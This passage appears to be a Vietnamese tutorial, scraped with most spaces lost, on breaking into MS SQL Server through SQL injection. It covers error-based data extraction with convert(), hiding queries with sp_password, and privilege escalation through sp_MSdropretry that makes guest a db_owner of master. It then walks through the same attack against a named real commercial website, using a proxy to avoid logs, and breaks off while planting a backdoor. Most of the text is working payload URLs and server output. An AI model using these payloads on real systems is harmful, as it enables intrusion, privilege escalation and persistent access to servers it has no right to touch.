Xâm nhập máy chủ MsSql qua lỗi SqlInjection & CrossDatabase

Syntax error converting the nvarchar value Microsoft SQLServer 7.00 7.00.623(Intel X86) Nov 23 1998 21:08:09Copyright (c) 19881998Microsoft Corporation StandardEdition on Windows NT 5.0 (Build 2195: Service Pack 3) toa column of data type int.
Nội dung trích xuất từ tài liệu:
Xâm nhập máy chủ MsSql qua lỗi SqlInjection & CrossDatabaseXâmnhậpmáychủMsSqlqualỗiSqlInjection&CrossDatabasetrangnàyđãđượcđọc lầnPHẦNI:CÁCKĨTHUẬTHACKTRONGSQL•sqlinjection•convertmagic•crossdatabasePHÁTHIỆNLỖISQLINJECTIONhttp://www.company.com/product/price.asp?id=1selectpricefromproductwhereid=1http://www.company.com/product/price.asp?id=1’selectpricefromproductwhereid=1’Unclosedquotationmarkbeforethecharacterstring‘http://www.company.com/product/price.asp?id=[...]KĨTHUẬTCONVERTMAGIChttp://wwww.company.com/product/price.asp?id=1and1=convert(int,@@version)sp_passwordselectpricefromproductwhereid=1and1=convert(int,@@version)sp_passwordSyntaxerrorconvertingthenvarcharvalueMicrosoftSQLServer7.007.00.623(IntelX86)Nov23199821:08:09Copyright(c)19881998MicrosoftCorporationStandardEditiononWindowsNT5.0(Build2195:ServicePack3)toacolumnofdatatypeint.sp_passwordwasfoundinthetextofthisevent.Thetexthasbeenreplacedwiththiscommentforsecurityreasons.•@@servername,db_name(),system_user,...•‘“()LỖICROSSDATABASECỦAMSSQLusetestdatabasecreateprocdbo.testasselect*frommaster.dbo.sysxloginsgoexectestselect*frommaster.dbo.sysxlogins•sa==dbo•db_ownercóthểcreate&designcácobjectcủadbo•SIDcủaprocdbo.test==SIDcủamaster.dbo.sysxloginsLỖIINJECTIONCỦAMASTER..SP_MSDROPRETRYCREATEPROCEDUREsp_MSdropretry(@tnamesysname,@pnamesysname)asdeclare@retcodeint/***Topublic*/exec(droptable+@tname)if@@ERROR0return(1)exec(dropprocedure+@pname)if@@ERROR0return(1)return(0)NÂNGQUYỀNQUAMASTER..SP_MSDROPRETRYexecsp_executesqlNcreateviewdbo.testasselect*frommaster.dbo.sysusersexecsp_msdropretryxxupdatesysuserssetsid=0x01wherename=dbo,xxexecsp_msdropretryxxupdatedbo.testsetsid=0x01,roles=0x01wherename=guest,xxexecsp_executesqlNdropviewdbo.test‘droptablexxupdatesysuserssetsid=0x01wherename=dbodropprocedurexxdroptablexxupdatedbo.testsetsid=0x01,roles=0x01wherename=guestdroptablexx•guest==db_ownercủadatabasemasterPHẦN2:MINHHỌAHACKSQL•Khaitháclỗisqlinjectiontạinhaxinh.com.vn•MộtsốkinhnghiệmkhihackSQLLỖISQLINJECTIONTẠINHAXINH.COM.VN•dùng“proxy.ia2.marketscore.com:80”ðểtránhbịghinhậtkíhttp://www.nhaxinh.com.vn/FullStory.asp?id=1http://www.nhaxinh.com.vn/FullStory.asp?id=1’MicrosoftOLEDBProviderforODBCDriverserror80040e14[Microsoft][ODBCSQLServerDriver][SQLServer]Unclosedquotationmarkbeforethecharacterstring./Including/general.asp,line840\XÁCĐỊNHVERSIONhttp://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,@@version)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer][SQLServer]SyntaxerrorconvertingthenvarcharvalueMicrosoftSQLServer7.007.00.1063(IntelX86)Apr9200214:18:16Copyright(c)19882002MicrosoftCorporationEnterpriseEditiononWindowsNT5.0(Build2195:ServicePack4)toacolumnofdatatypeint./Including/general.asp,line840XÁCĐỊNHSERVER_NAMEhttp://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,@@servername)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]SyntaxerrorconvertingthenvarcharvalueUNESCOtoacolumnofdatatypeint./Including/general.asp,line840http://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,db_name())MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]SyntaxerrorconvertingthenvarcharvalueNhaXinhtoacolumnofdatatypeint./Including/general.asp,line840http://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,system_user)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvaluenhaxinhtoacolumnofdatatypeint./Including/general.asp,line840•user_name():cácmembercủa“sysadmin”đượcmapsang“dbo”XÁCĐỊNHMỨCQUYỀNCỦASQLSERVERhttp://www.nhaxinh.com.vn/FullStory.asp?id=1;select*fromopenrowset(sqloledb,;;,)MicrosoftOLEDBProviderforODBCDriverserror80040e14[Microsoft][ODBCSQLServerDriver][SQLServer]AdhocaccesstoOLEDBprovidersqloledbhasbeendenied.Youmustaccessthisproviderthroughalinkedserver./Including/general.asp,line840•adminđãdisableopenrowset/sqloledb,sẽenablelạisauĐƯAGUESTVÀODB_OWNERCỦADATABASE MASTER1http://www.nhaxinh.com.vn/FullStory.asp?id=1;execsp_executesqlNcreateviewdbo.testasselect*frommaster.dbo.sysusersexecsp_msdropretryxxupdatesysuserssetsid=0x01wherename=dbo,xxexecsp_msdropretryxxupdatedbo.testsetsid=0x01,roles=0x01wherename=guest,xxexecsp_executesqlNdropviewdbo.test•Tạisao?guestlàdb_ownercủadatabasemasternênguestcóthểthihànhxp_regwritehoặcxp_cmdshellXÁCNHẬNGUESTĐÃNẰMTRONGDB_OWNERCỦA DATABASEMASTERCHƯA?http://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,(selecttop1namefrommaster..sysuserswhereroles=0x01andnamenotin(dbo)))MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalueguesttoacolumnofdatatypeint./Including/general.asp,line840CÀICỬASAU“BUILTIN\ADMINISTRATORS”http://www.nhaxinh.com.vn/FullStory.asp?id=1;execsp_executesqlNcreateviewdbo.testasselect*frommaster.dbo.sysxl ...